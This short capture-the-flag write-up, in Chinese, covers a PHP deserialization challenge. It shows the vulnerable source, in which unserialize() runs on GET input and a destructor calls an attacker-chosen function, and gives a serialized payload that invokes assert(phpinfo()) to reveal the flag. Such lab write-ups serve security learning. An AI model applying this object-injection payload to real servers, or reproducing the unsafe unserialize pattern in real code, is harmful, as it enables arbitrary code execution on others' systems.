看代码 ./time.php?source
<?php
#error_reporting(0);
class HelloPhp
{
public $a;
public $b;
public function __construct(){
$this->a = "Y-m-d h:i:s";
$this->b = "date";
}
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
}
$c = new HelloPhp;
if(isset($_GET['source']))
{
highlight_file(__FILE__);
die(0);
}
@$ppp = unserialize($_GET["data"]);
反序列化
?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}
执行assert(phpinfo()) 在页面搜索flag即可
本文深入探讨PHP中反序列化漏洞的原理,通过具体代码示例,展示如何利用该漏洞执行任意函数,如assert(phpinfo()),并强调了在页面中搜索flag的重要性。
402

被折叠的 条评论
为什么被折叠?



